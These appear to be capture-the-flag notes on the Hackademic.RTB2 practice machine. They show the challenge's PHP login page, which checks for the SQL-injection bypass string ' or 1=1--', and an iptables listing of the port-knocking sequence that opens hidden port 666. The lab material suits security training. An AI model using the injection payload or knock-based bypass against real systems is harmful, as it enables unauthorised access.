<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <html><head><title>Hackademic.RTB2</title><center><br><br><br><body bgcolor="black"><img src="hackademicrtb2.png"><font color="green"></head></form><body><h2><br><?php$pass_answer = "' or 1=1--'";$pass_answer_2 = "' OR 1=1--'";if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){    echo '<h2>';    echo 'Ok, nice shot...';    echo '<br>';    echo '</h2>';    echo '...but, you are looking in a wrong place bro! ;-)';    echo '<br>';    echo '<br>';    echo '<font color="black">';    echo '%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A';    echo '</font color="black">';}else{    echo '<h2>';    echo 'You are trying to login with wrong credentials!';    echo '<br>';    echo '</h2>';    echo "Please try again...";}?>

---

PORT KNOCKING

root@HackademicRTB2:~# iptables -L -n -viptables -L -n -vChain INPUT (policy ACCEPT 16 packets, 2935 bytes) pkts bytes target     prot opt in     out     source               destination             0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:666 recent: CHECK name: PHASE4 side: source    39  2512 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0           state ESTABLISHED     0     0 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0           state RELATED     0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: UPDATE name: PHASE1 side: source     0     0            tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1001 recent: SET name: PHASE1 side: source     0     0 INTO-PHASE2  tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1101 recent: CHECK name: PHASE1 side: source     0     0 INTO-PHASE3  tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1011 recent: CHECK name: PHASE2 side: source     0     0 INTO-PHASE4  tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1001 recent: CHECK name: PHASE3 side: source     0     0 REJECT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:666 reject-with icmp-port-unreachable Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target     prot opt in     out     source               destination         Chain OUTPUT (policy ACCEPT 57 packets, 5293 bytes) pkts bytes target     prot opt in     out     source               destination         Chain INTO-PHASE2 (1 references) pkts bytes target     prot opt in     out     source               destination             0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: REMOVE name: PHASE1 side: source     0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: SET name: PHASE2 side: source     0     0 LOG        all  --  *      *       0.0.0.0/0            0.0.0.0/0           LOG flags 0 level 4 prefix `INTO PHASE2: ' Chain INTO-PHASE3 (1 references) pkts bytes target     prot opt in     out     source               destination             0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: REMOVE name: PHASE2 side: source     0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: SET name: PHASE3 side: source     0     0 LOG        all  --  *      *       0.0.0.0/0            0.0.0.0/0           LOG flags 0 level 4 prefix `INTO PHASE3: ' Chain INTO-PHASE4 (1 references) pkts bytes target     prot opt in     out     source               destination             0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: REMOVE name: PHASE3 side: source     0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: SET name: PHASE4 side: source     0     0 LOG        all  --  *      *       0.0.0.0/0            0.0.0.0/0           LOG flags 0 level 4 prefix `INTO PHASE4: ' 

---

References

1. http://www.aldeid.com/wiki/Hackademic-RTB2
2. https://www.rcesecurity.com/2012/01/hackademicrtb2-and-the-art-of-port-knocking/
3. https://wiki.archlinux.org/index.php/Port_Knocking